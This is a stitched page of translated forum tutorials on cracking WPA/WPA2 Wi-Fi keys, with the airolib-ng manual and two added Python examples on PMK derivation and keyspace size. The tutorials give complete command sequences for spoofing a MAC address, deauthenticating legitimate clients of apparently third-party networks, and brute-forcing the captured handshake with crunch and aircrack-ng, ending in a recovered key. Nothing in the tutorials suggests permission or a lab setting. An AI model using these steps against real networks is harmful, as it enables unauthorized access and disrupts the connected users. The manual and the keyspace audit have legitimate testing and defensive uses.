
What a drag, what a drag, but since I'm not doing my university social service I'll spend the time writing my first post..



Lots of people know how to get WEP keys, I mean, who doesn't? Those old Wired Equivalent
Privacy keys, which even got a DSL distribution called Beini made for the lazy.
Give me a break.
A few others have done some research and know how to get a WPA key, or at least know the
basic principles of how to; no matter, the idea of this post is to take you out of the box you
live in, get you thinking outside of it, and move forward using more of your imagination.

Does anyone know how to use airolib? You know, the rainbow-table-style tables that let you test
many more keys per second than aircrack allows with a plain dictionary, where with a dual-core
processor and 2 GB the most you get is 1200 K/s. Well, enough rambling, let's get to the point....


REQUIREMENTS

aircrack-ng libraries
crunch password generator binaries
a handshake from a WPA network
and a shitload of patience



STEPS


airmon-ng stop wlan0 (stop your wireless card; the interface name may differ from "wlan0")

ifconfig wlan0 down (bring the card down to reconfigure it)

macchanger --mac 00:11:22:33:44:55 wlan0 (change the Media Access Control address to a simpler
one that makes the following steps easier)

iwconfig wlan0 mode monitor (switch the card to monitor mode)


airodump-ng wlan0 (monitor the Wi-Fi signals within your range)
______________________________________________________________________
EXAMPLE

CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

08:76 F:60:3C:E8 -78 57 0 0 11 54e WPA PSK TELMEX

BSSID STATION PWR Rate Lost Packets Probes
08:76 F:60:3C:E8 00:12:34:56:78:90
______________________________________________________________________

aireplay-ng -9 wlan0 *OPTIONAL* (run an injection test to check that you are within range
and will be able to deauthenticate the client)
______________________________________________________________________

airodump-ng -c 11 -w dump --bssid 08:76 F:60:3C:E8 wlan0 (listen on the network in case a
handshake comes in)



## NOW WE NEED TO DEAUTHENTICATE A CLIENT (A LEGITIMATE USER CONNECTED
TO THE NETWORK) TO OBTAIN A HANDSHAKE, WHICH IS WHERE THE KEY IS,
AND WHICH IS THEN RECOVERED BY BRUTE FORCE.

aireplay-ng -0 10 -c 00:12:34:56:78:90 -b 08:76 F:60:3C:E8 -e TELMEX wlan0



AFTER THAT, A RESPONSE LIKE THIS WILL APPEAR IN THE
MONITORING WINDOW


CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34 [HANDSHAKE:00:12:34:56:78:90] <--------
------LOOK, YOU CAPTURED THE 4-WAY HANDSHAKE!

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

08:76 F:60:3C:E8 -78 57 0 0 11 54e WPA PSK TELMEX

BSSID STATION PWR Rate Lost Packets Probes
08:76 F:60:3C:E8 00:12:34:56:78:90
_____________________________________________________________________



we now have the handshake in the file dump-01.cap, and to break it you have two options: use
crunch to generate passwords and pipe them straight into aircrack, or build tables with airolib,
which are somewhat faster, although you'll need a good amount of free space, at least around
100 GB; I recommend buying a 1 TB hard drive.


let's start with crunch + aircrack



if you use BackTrack 5 follow these steps; otherwise just change the path to wherever your
crunch binaries are



cd /pentest/passwords/crunch

./crunch 10 12 0123456789 | aircrack-ng /root/dump-01.cap -e TELMEX -w -


# now crunch will start generating passwords from the digits we gave it, in this case
0123456789, ten to twelve digits long. You can add letters, but the possibilities grow
exponentially and it gets slow; it takes a couple of days to test all those
possibilities. I SAID YOU'D NEED PATIENCE



## now with the airolib suite; here you will need at least 100 GB of space on your disk,
because the table takes up a lot of room. With the previous method you don't need any disk
space at all.


touch essid.txt (create a text file named essid.txt)

echo TELMEX > essid.txt (write the network name into the text file we created)

cat essid.txt (read the text file to confirm it was written)

airolib-ng wpa --import essid essid.txt (create the table named wpa and import the
network name from the text file we created)

# now move to the directory where you have crunch in order to run it

./crunch 10 10 0123456789 | airolib-ng /root/wpa --import passwd -

# this last step imports the passwords that crunch will generate, which will total
100 GIGS; this takes some time, but if you pay attention to the counter running below
you'll notice it creates a huge number of probable passwords, and much faster.
Be patient and wait.


airolib-ng /root/wpa --stats

airolib-ng /root/wpa --clean all

airolib-ng /root/wpa --batch

airolib-ng /root/wpa --verify all

## I COULDN'T BE BOTHERED TO EXPLAIN THE REMAINING STEPS, JUST RUN THEM,
DON'T MAKE A FUSS. AFTER THAT THE TABLE NAMED wpa WILL BE READY AND
YOU CAN PROCEED TO CRACK THE KEY.


aircrack-ng -r /root/wpa dump-01.cap -e TELMEX



GOOD LUCK. IF YOU LIKED IT LEAVE A COMMENT, AND IF NOT, YOU KNOW
WHAT TO DO TOO; ADD IT TO FAVORITES, SHARE IT ON YOUR MYSPACE,
FACEBOOK, TWITTER, GOOGLE+

"hector leal"

hahahaha


if you need help with anything let me know, I'm in Tamaulipas and San Luis Potosí

STARK

s-t-a-r-k@live.com


Airolib-ng
Description
Airolib-ng is an aircrack-ng suite tool designed to store and manage essid and password
lists, compute their Pairwise Master Keys (PMKs) and use them in WPA/WPA2
cracking. The program uses the lightweight SQLite3 database as the storage mechanism
which is available on most platforms. The SQLite3 database was selected taking in
consideration platform availability plus management, memory and disk overhead.
WPA/WPA2 cracking involves calculating the pairwise master key, from which the
pairwise transient key (PTK) is derived. Using the PTK, we can compute the message
integrity code (MIC) for a given packet; if it turns out to be identical to the packet's
MIC, the PTK was correct and therefore the PMK was correct as well.
Calculating the PMK is very slow since it uses the pbkdf2 algorithm. Yet the PMK is
always the same for a given ESSID and password combination. This allows us to
precompute the PMK for given combinations and speed up cracking the wpa/wpa2
handshake. Tests have shown that using this technique in aircrack-ng can check more
than 50 000 passwords per second using pre-computed PMK tables.
Computing the PMK is still required, yet we can:
Precompute it for later and/or shared use.
Use distributed machines to generate the PMK and use their value elsewhere.
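To make the "same ESSID and password, same PMK" point concrete, here is an added Python example (not part of the airolib-ng documentation or the aircrack-ng code base) that performs the WPA-PSK derivation the text describes: PBKDF2-HMAC-SHA1 with the ESSID as salt, 4096 rounds, 32-byte output, as fixed by IEEE 802.11i. It also applies the 8..63 / 1..32 length rules that airolib-ng enforces on import (the source of its "invalid lines ignored" count, described further down), and shows that a PMK computed for one ESSID is worthless for another, which is the defensive reason a unique network name defeats shared precomputed tables. The sample password list is constructed for the demonstration; the `password`/`IEEE` vector is the standard's published test vector.

```python
import hashlib

# WPA-PSK length rules (IEEE 802.11i); airolib-ng applies the same limits when it
# imports lists, which is where its "invalid lines ignored" count comes from.
PASSPHRASE_MIN, PASSPHRASE_MAX = 8, 63
ESSID_MIN, ESSID_MAX = 1, 32
PBKDF2_ROUNDS = 4096   # fixed by the standard
PMK_LEN = 32           # 256-bit PMK


def is_valid_passphrase(passphrase: str) -> bool:
    return PASSPHRASE_MIN <= len(passphrase) <= PASSPHRASE_MAX


def is_valid_essid(essid: str) -> bool:
    return ESSID_MIN <= len(essid.encode()) <= ESSID_MAX


def pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes).

    The ESSID is the salt: the same passphrase on a different network name gives a
    completely different PMK, so a table built for one ESSID is useless for another.
    """
    if not is_valid_passphrase(passphrase):
        raise ValueError("passphrase must be 8..63 characters")
    if not is_valid_essid(essid):
        raise ValueError("ESSID must be 1..32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(),
                               PBKDF2_ROUNDS, PMK_LEN)


def pmk_table_reusable(passphrase: str, essid_a: str, essid_b: str) -> bool:
    """True only if a PMK precomputed for essid_a is also valid for essid_b."""
    return pmk(passphrase, essid_a) == pmk(passphrase, essid_b)


def filter_import(lines, kind: str):
    """Mimic airolib-ng's import filtering: return (accepted, ignored_count).

    kind is "essid" or "passwd", as in `airolib-ng db --import {essid|passwd} file`.
    """
    check = is_valid_essid if kind == "essid" else is_valid_passphrase
    accepted, ignored = [], 0
    for line in lines:
        value = line.rstrip("\r\n")
        if check(value):
            accepted.append(value)
        else:
            ignored += 1
    return accepted, ignored


if __name__ == "__main__":
    # Constructed sample list: two usable passphrases, two that are too short.
    sample = ["12345678\n", "short\n", "correcthorsebattery\n", "abc\n"]
    ok, bad = filter_import(sample, "passwd")
    print(f"Writing... read, {bad} invalid lines ignored.")   # same wording as the tool
    print("PMK for password/IEEE:", pmk("password", "IEEE").hex())
    print("Table for ESSID Harkonen reusable for teddy?",
          pmk_table_reusable("12345678", "Harkonen", "teddy"))
```

Running the script shows the two short entries being dropped exactly as airolib-ng reports them, and that the Harkonen table does not carry over to teddy even for an identical passphrase, which is why `--batch` has to recompute every ESSID/password combination separately.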
To learn more about WPA/WPA2:
See the WPA/WPA2 Information section on the wiki links page.
To learn more about coWPAtty:
Will Hack For SUSHI > CoWPAtty
Wireless Defense CoWPAtty writeup
As stated above, this program requires the SQLite3 database environment. You must be
running version 3.3.17 or above. You may obtain the latest version from the SQLite
download page.
Usage
Usage: airolib <database> <operation> [options]
Where:
database is name of the database file. Optionally specify the full path.
operation specifies the action you would like taken on the database. See below for a
complete list.
options may be required depending on the operation specified
Here are the valid operations:
--stats - Output some information about the database.
--sql {sql} - Execute the specified SQL statement.
--clean [all] - Perform steps to clean the database from old junk. The option 'all' will
also reduce file size if possible and run an integrity check.
--batch - Start batch-processing all combinations of ESSIDs and passwords. This must
be run prior to using the database within aircrack-ng or after you have added
additional SSIDs or passwords.
--verify [all] - Verify a set of randomly chosen PMKs. If the option 'all' is given, all(!)
PMKs in the database are verified and the incorrect ones are deleted.
--export cowpatty {essid} {file} - Export to a cowpatty file.
--import cowpatty {file} - Import a cowpatty file and create the database if it does not
exist.
--import {essid|passwd} {file} - Import a text flat file as a list of either ESSIDs or
passwords and create the database if it does not exist. This file must contain one essid
or password per line. Lines should be terminated with line feeds, meaning press
enter at the end of each line when entering the values.
Usage Examples
Here are usage examples for each operation.
Status Operation
Enter:
airolib-ng testdb --stats
Where:
testdb is the name of the database to be created.
--stats is the operation to be performed.
The system responds:
There are 2 ESSIDs and 232 passwords in the database. 464 out of
464 possible combinations have been computed (100%).

ESSID Priority Done
Harkonen 64 100.0
teddy 64 100.0
SQL Operation
The following example will give the SSID VeryImportantESSID maximum priority.
Enter:
airolib-ng testdb --sql 'update essid set prio=(select min(prio)-1
from essid) where essid="VeryImportantESSID";'
The system responds:
update essid set prio=(select min(prio)-1 from essid) where
essid="VeryImportantESSID";
Query done. 1 rows affected.
The following example will look for very important patterns in the pmk.
Enter:
airolib-ng testdb --sql 'select hex(pmk) from pmk where hex(pmk) like
"%DEADBEEF%"'
The system responds:
hex(pmk)
BF3F122D3CE9ED6C6E7E1D7D13505E0A41EC4C5A3DEADBEEFFEFF597387AFCE3
Clean Operation
To do a basic cleaning, enter:
airolib-ng testdb --clean
The system responds:
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Done.
To do a basic cleaning, reduce the file size if possible and run an integrity check, enter:
airolib-ng testdb --clean all
The system responds:
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
integrity_check
ok
Query done. 2 rows affected.
Done.
Batch Operation
Enter:
airolib-ng testdb --batch
The system responds:
Computed 464 PMK in 10 seconds (46 PMK/s, 0 in buffer). No free ESSID
found. Will try determining new ESSID in 5 minutes...
Verify Operation
To verify a 1000 random PMKs, enter:
airolib-ng testdb --verify
The system responds:
Checking ~10.000 randomly chosen PMKs...
ESSID CHECKED STATUS
Harkonen 233 OK
teddy 233 OK
To verify all PMKs, enter:
airolib-ng testdb --verify all
The system responds:
Checking all PMKs. This could take a while...
ESSID PASSWORD PMK_DB CORRECT
Cowpatty table Export Operation
Enter:
airolib-ng testdb --export cowpatty test cowexportoftest
The system responds:
Exporting...
Done.
Import Operation
SSID
To import an ascii list of SSIDs and create the database if it does not exist, enter:
airolib-ng testdb --import essid ssidlist.txt
Where:
testdb is the name of the database to be updated and it will be created if it does not
exist.
--import is the operation to be performed.
essid indicates it is a list of SSIDs.
ssidlist.txt is the file name containing the SSIDs. One per line. It can optionally be fully
qualified.
The system responds:
Reading...
Writing...
Done.
Passwords
To import an ascii list of passwords and create the database if it does not exist, enter:
airolib-ng testdb --import passwd password.lst
Where:
testdb is the name of the database to be updated and it will be created if it does not
exist.
--import is the operation to be performed.
passwd indicates it is a list of passwords.
password.lst is the file name. One per line. It can optionally be fully qualified.
The system responds:
Reading...
Writing... read, 1814 invalid lines ignored.
Done.
Cowpatty tables
To import a cowpatty table and create the database if it does not exist, enter:
airolib-ng testdb --import cowpatty cowexportoftest
Where:
testdb is the name of the database to be updated and it will be created if it does not
exist.
--import is the operation to be performed.
cowpatty indicates it is a cowpatty table.
cowexportoftest is the file name. One per line. It can optionally be fully qualified.
The system responds:
Reading header...
Reading...
Updating references...
Writing...
Aircrack-ng Usage Example
The ultimate objective is to speed up WPA/WPA2 cracking under aircrack-ng. To use
the tables you have built using airolib-ng then use the -r option to specify the database
containing the pre-calculated PMKs.
Enter:
aircrack-ng -r testdb wpa2.eapol.cap
Where:
-r specifies that a pre-computed PMK database will be used.
testdb is the name of the database file and may optionally be fully qualified.
wpa2.eapol.cap is capture file containing the WPA/WPA2 handshake.
Note: All the other standard options which are applicable to WPA/WPA2 may also be
used. This is a very limited example.
Usage Tips
Creating your own database example
To test the tool yourself
get yourself the sqlite3 library and headers (latest version is recommended)
get yourself the 1.0dev version of the aircrack-ng suite
import an essid, e.g. echo Harkonen | airolib-ng testdb --import essid -
Database <testdb> does not already exist, creating it...
Database <testdb> sucessfully created
Reading file...
Writing...
Done.
import a password, e.g. echo 12345678 | airolib-ng testdb --import passwd -
Reading file...
Writing...
Done.
start the batch process (airolib-ng testdb --batch), wait for it to run out of work, kill it
Computed 1 PMK in 0 seconds (1 PMK/s, 0 in buffer). All ESSID
processed.
Check the database to confirm everything has been computed (airolib-ng testdb
--stats)
There are 1 ESSIDs and 1 passwords in the database. 1 out of 1
possible combinations have been computed (100%).

ESSID Priority Done
Harkonen 64 100.0
crack your WPA/WPA2 handshake, e.g. aircrack-ng -r testdb -e Harkonen
wpa2.eapol.cap
KEY FOUND! [ 12345678 ]
Using a sample pre-made database
Another way to test for yourself is to download a pre-made database called
passphrases.db. This file is also located in the test directory of the aircrack-ng sources.
Then try this database with the two test WPA/WPA2 files supplied in the test directory
of the aircrack-ng sources. The WPA/WPA2 test files are called wpa.cap and
wpa2.eapol.cap.
The commands are either of:
aircrack-ng -r passphrases.db wpa.cap
aircrack-ng -r passphrases.db wpa2.eapol.cap
This should give you the passphrase. Success indicates that your setup is working
correctly.
Usage Troubleshooting
Enabling Airolib-ng
Airolib-ng is not compiled by default. To enable compiling, do make sqlite=true and
make sqlite=true install.
Compile Error
Although this is not a usage troubleshooting tip, it is a common problem during the
compilation of the 1.0dev version. As a reminder, SQLite must be version 3.3.13 or
above. This is the compile error you receive when your version of SQLite is less than
the requirement:
gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`../evalrev` -I/usr/local/include -Iinclude -DHAVE_SQLITE -c -o airolib-ng.o airolib-ng.c
airolib-ng.c: In function `sql_prepare':
airolib-ng.c:129: warning: implicit declaration of function `sqlite3_prepare_v2'
make[1]: *** [airolib-ng.o] Error 1
make[1]: Leaving directory `/root/1.0-dev/src'
make: *** [all] Error 2
When is the SQLite patch needed?
The SQLite patch included with aircrack-ng sources is only needed when compiling
under Windows. It is required to remove some elements which will not compile under
windows and are not required.
It is not required for linux installations.
Airolib-ng fails to open or create the database
On windows only, opening/creating a database doesn't work when airolib-ng is in
directories containing special characters like '', '', '', '', (directories containing
spaces are not affected).
The solution is to move airolib-ng and its database in another directory without these
special characters.
"invalid lines ignored" error message
This error message may occur when importing passwords or ESSIDs. It is the number
of records with invalid passwords or ESSIDs lengths. The valid lengths are:
Passwords must have a length of 8 through 63 characters
ESSIDs must have a length of 1 through 32 characters
"Quitting aircrack-ng..." error message
If you subsequently run aircrack-ng and only receive Quitting aircrack-ng then the
ESSID is missing from the database. You need to load it plus rerun the batch option.

CRUNCH

For a while people had been asking me to put together a tutorial on how to crack networks
with WPA and WPA2 encryption.
So I decided to do this tutorial using a tool that replaces dictionaries and that, in my case,
has been quite effective.

Let's start by making a couple of things clear. WEP encryption, as we already know, is
easy to break: packets are captured and then, by reverse engineering, those packets are
cracked to get the key.
With WPA and WPA2 it's different; the previous method can't be used.
These ciphers use something called a "handshake", which is a kind of "greeting" between
the AP (Access Point) and the client.
What we have to capture in this case is precisely that handshake, in order to be "on good
terms" with the AP and then try to break the key, with a dictionary or, in this case, with
another method that I use.

Now that the workings are clear, here's the method:

I'm going to use a piece of software called "crunch"

Download it from here
DOWNLOAD CRUNCH


Once it's downloaded, extract it:
tar -xvzf crunch*.tgz


Enter the directory
cd crunch


Compile it; just in case you don't have it, first the build-essential package:
apt-get install build-essential


Now compile it:
make

make install


Finally copy the command to sbin:
cp crunch /usr/sbin/


I'll assume you have aircrack-ng installed, but since I'm nice, here's the apt-get just in
case:
apt-get install aircrack-ng



Let's begin!!


We put our card in promiscuous (monitor) mode (in my case the interface is ath1, use
your own):
airodump-ng ath1


A few networks show up:
CH 6 ][ Elapsed: 4 s ][ 2010-07-11 23:44

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1B:11 3:A9:5D 2 2 0 0 1 54 . WEP WEP dlink-007
00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2 CCMP PSK PORINGA
00:21:29:EB:57:85 2 0 0 0 6 54 OPN Nazario_w
00:21:29:96:85:0C 9 3 1 0 6 54e WEP WEP Martin
00:1A:70:3D:3D:81 3 2 0 0 6 54 OPN linksys
00:1C:10:2A:C7:99 5 3 0 0 6 54e OPN Nazario_w
00:18:E7:56:26:89 7 4 0 0 6 54 . WPA TKIP PSK default
00:26:5A:53:E5:84 4 4 0 0 6 54 WEP WEP AR-RED
00:1D:7E:22:25:22 -1 0 3 1 6 -1 OPN <length:
00:18:E7:61:A9:47 8 3 0 0 6 54 . WPA TKIP PSK ESTUDIO J
00:0A:E5:79:83:E8 1 4 1 0 11 11 WEP WEP CIBERA
00:21:29:72 C:32 5 3 0 0 11 54 . WEP WEP linksys
00:0F:A3 1:9C:5B 21 6 0 0 12 54 . WEP WEP LKSA
00:25:9C:69:97:B7 16 12 0 0 11 54e WPA2 TKIP PSK WIPS
00:0F:A3 1:67:8A 6 6 0 0 4 54 . WEP WEP Wi-Fi Arn
1C:AF 7:42:E1:E6 -1 0 0 0 9 -1 <length:
00:15:63:11:69:90 16 10 0 0 9 12e. WEP WEP <length:
00:25:9C:3B:69:28 23 15 0 0 6 54e WEP WEP Apicc
00:40:77:BB:55:03 21 19 0 0 6 54e WPA TKIP PSK dd-wrt
00:21:00:61:B9:12 1 2 0 0 1 54 OPN FT89769


I swear the PORINGA ESSID isn't mine!!

OK, let's continue. The one I'm going to use is "default", which has WPA TKIP PSK encryption:

TKIP: (Temporal Key Integrity Protocol)
PSK: (Pre-Shared Key)


Once we have the AP's MAC and the channel, we run:
airodump-ng -c CHANNEL-NUMBER --bssid AP-MAC -w default ath1


In this case:
airodump-ng -c 6 --bssid 00:18:E7:56:26:89 -w default ath1


Now airodump will only listen on that channel and to that AP:
CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18:E7:56:26:89 9 90 4152 762 5 6 54 . WPA TKIP PSK defau

BSSID STATION PWR Rate Lost Packets Probes

00:18:E7:56:26:89 00:0C:41:7A:77:43 51 11 - 1 42 1102
00:18:E7:56:26:89 00:1F:E1:23:33:40 15 0 - 1 0 61 default


Here we have two possible scenarios:

1) Wait for a new client to connect in order to acquire the handshake
2) Deauthenticate an already connected client so that it reconnects, and acquire the handshake

In this case we'll use the second option. Note down the AP's MAC and the connected
client's MAC.

AP: 00:18:E7:56:26:89
Connected client: 00:0C:41:7A:77:43

We deauthenticate the client with this command:
aireplay-ng -0 10 -a AP-MAC -c CLIENT-MAC ath1


In this case:
aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1


It does something like this:
[root@debian dke]# aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1
23:46:18 Waiting for beacon frame (BSSID: 00:18:E7:56:26:89) on channel 6
23:46:19 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 1|173 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [14|155 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|207 ACKs]
23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [11|173 ACKs]
23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [31|186 ACKs]
23:46:26 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|240 ACKs]
23:46:27 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [3 186 ACKs]
23:46:27 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|137 ACKs]
23:46:28 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|147 ACKs]
23:46:32 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [19|258 ACKs]


If it doesn't deauthenticate on the first try, run the command again.

Once the user has been deauthenticated and logs back in, the handshake will appear at the
top right:
CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ][ WPA handshake: 00:18:E7:56:26:89


Done, we have our handshake; now we use crunch:


Type this:
crunch 8 9 0123456789 | aircrack-ng -a 2 PATH-TO-CAP-FILE -e default -b
AP-MAC -w -


In this case:
crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e default -b
00:18:E7:56:26:89 -w -


Clarification: "crunch 8 9" refers to the fact that WPA keys have a minimum of 8
characters; in this case I only want it to try up to 9 characters, and to use the
digits 0123456789.
75% of users make the mistake of "securing" the network with WPA and then using numeric keys,
and here we'll see how easy those are to get with crunch.
If we wanted crunch to use letters, we would write "crunch 8 15 abcdefghijklmno"
(maximum 15 characters).
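Both tutorials on this page make the same point in passing: a numeric-only PSK of 8 to 9 digits (or 10 to 12 in the first post) is a small search space, and "adding letters" makes the possibilities grow exponentially. The following Python example, added here and not part of either tutorial, puts numbers on that claim from the defender's side: it computes the keyspace a `crunch <min> <max> <charset>` run covers, converts it to days at the 1445.33 k/s shown in the aircrack-ng output below (aircrack-ng's k/s counter is keys per second), and audits a given PSK by the character class it falls into. The charset sizes (10, 26, 62, 95 printable ASCII) and the 8-character WPA minimum are standard; the audit's rate is whatever the caller passes in.

```python
# Character classes a crunch run would have to enumerate, with the sizes used below.
CHARSETS = {
    "digits": "0123456789",
    "lowercase letters": "abcdefghijklmnopqrstuvwxyz",
    "letters and digits": "abcdefghijklmnopqrstuvwxyz"
                          "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
}
PRINTABLE_ASCII = "".join(chr(c) for c in range(32, 127))   # 95 characters
WPA_MIN_LEN = 8   # WPA passphrases are at least 8 characters


def keyspace(charset: str, min_len: int, max_len: int) -> int:
    """Number of candidates `crunch <min_len> <max_len> <charset>` would produce."""
    n = len(set(charset))   # crunch's charset is a set of symbols; duplicates don't count
    return sum(n ** length for length in range(min_len, max_len + 1))


def days_to_exhaust(space: int, keys_per_second: float) -> float:
    """Worst-case time to try the whole space at a given test rate, in days."""
    return space / keys_per_second / 86400


def classify_psk(psk: str) -> str:
    """Name the smallest charset class that still contains every character of psk."""
    if psk.isdigit():
        return "digits"
    if psk.isalpha() and psk.islower() and psk.isascii():
        return "lowercase letters"
    if psk.isalnum() and psk.isascii():
        return "letters and digits"
    return "mixed with symbols"


def audit_psk(psk: str, keys_per_second: float) -> dict:
    """Estimate how long a crunch run covering this PSK's class and length would take.

    The space counts every length from the WPA minimum (8) up to the PSK's own length,
    which is what a run like `crunch 8 <len> <charset>` has to cover to be sure of it.
    """
    cls = classify_psk(psk)
    charset = CHARSETS.get(cls, PRINTABLE_ASCII)
    space = keyspace(charset, WPA_MIN_LEN, len(psk))
    return {
        "class": cls,
        "length": len(psk),
        "keyspace": space,
        "days": days_to_exhaust(space, keys_per_second),
    }


if __name__ == "__main__":
    rate = 1445.33   # keys/s reported by aircrack-ng in the capture further down
    print("crunch 8 9 0123456789 ->", keyspace("0123456789", 8, 9), "candidates,",
          round(days_to_exhaust(keyspace("0123456789", 8, 9), rate), 1), "days")
    # Constructed sample PSKs: the tutorial's recovered key vs. two stronger choices.
    for sample in ("00072169", "Tr0ub4dor", "correct horse battery staple"):
        print(sample, audit_psk(sample, rate))
```

The digits-only key recovered below sits in a space of 10^8 candidates, well under a day at that rate, while a 9-character letters-and-digits key already costs on the order of years; the audit is the check to run on your own PSK before deciding whether the first post's "buy a 1 TB disk for tables" is a risk you face.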

Now let's watch crunch start generating keys and testing them with aircrack-ng:

[root@debian dke]# crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e
default -b 00:18:E7:56:26:89 -w -
Opening /home/dke/default-01.cap
Reading packets, please wait...



Aircrack-ng 1.0 rc3


[00:00:50] 72172 keys tested (1445.33 k/s)


KEY FOUND! [ 00072169 ]


Master Key : F0 BE A1 08 A5 4C D6 E4 08 5C 5F B4 42 4A 69 F0
32 1D C9 11 D5 F3 BB 64 3D F2 31 AB FA F7 A7 1E

Transient Key : 72 42 D4 F0 91 91 E9 27 F8 8E D0 DF 1D 48 1B AD
16 10 78 D5 B1 7E 8D 9E 7A 76 68 AC 44 2A 37 94
30 4C 47 F5 FE EB 01 7E 8B 64 87 EF 78 3D 2F 1E
E8 6B 4A 2E E4 95 F4 57 4A 32 05 54 66 AA D6 98

EAPOL HMAC : C8 28 B2 83 87 05 18 45 D8 26 C0 42 1D AB A0 7D
